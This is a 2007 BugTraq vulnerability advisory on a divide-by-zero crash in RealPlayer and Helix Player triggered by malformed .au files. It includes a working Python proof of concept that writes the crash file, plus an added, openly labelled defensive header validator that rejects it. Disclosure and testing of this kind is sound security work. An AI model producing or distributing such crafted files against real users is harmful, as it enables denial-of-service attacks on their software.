BugTraq
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability Sep 11 2007 09:31AM
OS2A BTO (os2a bto gmail com)
Advisory attached.

OS2A
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability

OS2A ID: OS2A_1010

08/21/2007 Issue Discovered
08/31/2007 Vendor Notification

Class: Denial of Service
Severity: High

Overview:
-------------

RealPlayer/Helix Player is a media player that plays popular media formats
as well as organizing your music and videos.

Description:
--------------

A Denial of Service flaw exists in RealPlayer and HelixPlayer when a user
tries to open a malformed .au file. The flaw is a division by zero that
occurs while the player processes the malformed AU file.

An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.

Impact:
--------

Successful exploitation allows an attacker to crash a vulnerable application
via a specially crafted file (denial of service).

Affected Software(s):
---------------------

RealPlayer 10.1.0.3114 and prior
HelixPlayer

Tested on:

- RealPlayer-10.1.0.3114
- RealPlayer-10.0.9
- RealPlayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively
- RealPlayer10-5Gold on Windows XP
- HelixPlayer-1.0.6.778 on FC6

AV MP3 Player and Media Player Classic are also found to be vulnerable.

Affected Platform:
------------------

Microsoft Windows (all platforms)
RedHat Linux
Fedora Core Linux
SuSE Linux

Proof of Concept:
------------------

The following Python program generates the malformed .au file:

import sys

# Sun .au header (six big-endian 32-bit fields starting with the ".snd"
# magic): data offset 0x118, data size 0x020142DC, encoding 1 (8-bit mu-law),
# sample rate 0x02021F40 and a channel count of 0, followed by filler bytes.
# The advisory does not say which field the player divides by; the zero
# channel count is the likely divisor. Bytes literals and binary mode keep
# the output identical on Python 2.6+ and Python 3.
head = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01" +
        b"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +
        b"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print("[x] RealPlayer/Helix Player/Kaboodle Player DoS")

try:
    f = open("exploit.au", "wb")
except IOError as e:
    print("Unable to open file: %s" % e)
    sys.exit(0)

print("[x] File successfully opened for writing.")

try:
    f.write(head)
except IOError as e:
    print("Unable to write to file: %s" % e)
    sys.exit(0)

print("[x] File successfully written.")
f.close()

print("[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players.")
# End of program

RealPlayer crashes with the following exception; the shell reports that the
child process started by the launcher script's $REALPLAYBIN "$@" line was
killed by SIGFPE:

Floating point exception$REALPLAYBIN "$@"
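A defender-side counterpart to the PoC, added here and not part of the advisory: a Python 3 parser that validates the six .au header fields before any of them reaches a division or is used as a buffer length, run over the PoC's own header bytes and over a constructed well-formed file. The encoding table is the standard Sun .au one; the advisory does not say which field RealPlayer divides by, so treating the zero channel count as the divisor is an assumption.

```python
import struct

AU_MAGIC = b".snd"
AU_HEADER_LEN = 24  # six big-endian 32-bit fields
# Bytes per sample for the common Sun .au encoding ids (1 = 8-bit mu-law).
BYTES_PER_SAMPLE = {1: 1, 2: 1, 3: 2, 4: 3, 5: 4, 6: 4, 7: 8, 27: 1}

def parse_au_header(data):
    """Validate every header field a player later divides by or uses as a
    length, raising ValueError before a zero or out-of-range value is used."""
    if len(data) < AU_HEADER_LEN:
        raise ValueError("truncated header")
    magic, offset, size, enc, rate, chans = struct.unpack(">4sIIIII", data[:24])
    if magic != AU_MAGIC:
        raise ValueError("bad magic")
    if enc not in BYTES_PER_SAMPLE:
        raise ValueError("unknown encoding %d" % enc)
    if chans == 0:  # assumed divisor: frame size / duration math needs channels
        raise ValueError("channel count is zero")
    if rate == 0:
        raise ValueError("sample rate is zero")
    if offset < AU_HEADER_LEN or offset > len(data):
        raise ValueError("data offset %d outside file" % offset)
    available = len(data) - offset
    if size == 0xFFFFFFFF:  # format convention: size unknown, use what is there
        size = available
    if size > available:
        raise ValueError("data size %d exceeds file" % size)
    frame = chans * BYTES_PER_SAMPLE[enc]
    return {"encoding": enc, "rate": rate, "channels": chans,
            "frames": size // frame, "seconds": size / float(frame * rate)}

def check_au(data):
    """Return 'ok: ...' or 'rejected: <reason>' for an in-memory file image."""
    try:
        h = parse_au_header(data)
    except ValueError as exc:
        return "rejected: %s" % exc
    return "ok: %d frames, %.3f s" % (h["frames"], h["seconds"])

# Field values decoded from the advisory's PoC bytes (data offset 0x118, data
# size 0x020142DC, mu-law, sample rate 0x02021F40, 0 channels) plus its tail.
POC_AU = (struct.pack(">4sIIIII", AU_MAGIC, 0x118, 0x020142DC, 1, 0x02021F40, 0)
          + b"\x00\x31\x00\x00\x00\x01\x02" + b"\x00" * 50 + b"fff\x00")
# Constructed well-formed file: 16 mono mu-law frames at 8 kHz.
GOOD_AU = struct.pack(">4sIIIII", AU_MAGIC, 24, 16, 1, 8000, 1) + b"\x00" * 16

if __name__ == "__main__":
    print("PoC file :", check_au(POC_AU))   # rejected: channel count is zero
    print("good file:", check_au(GOOD_AU))  # ok: 16 frames, 0.002 s
```

Note that the PoC header fails more than one check: with the channel count patched to 1 it is still rejected because its data offset (0x118 = 280) lies beyond the end of the 85-byte file.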

CVSS Score Report:
------------------

ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED

CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
CVSS Temporal Score = 6.4
Risk factor = High

Reference:
-----------

A similar attack was found recently against Windows Media Player:
http://www.safehack.com/exp/mp/mplayer11.txt

Solution/Work Around:
--------------------

Do not open untrusted .au files.

Credits:
--------

Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with
the discovery of this vulnerability.
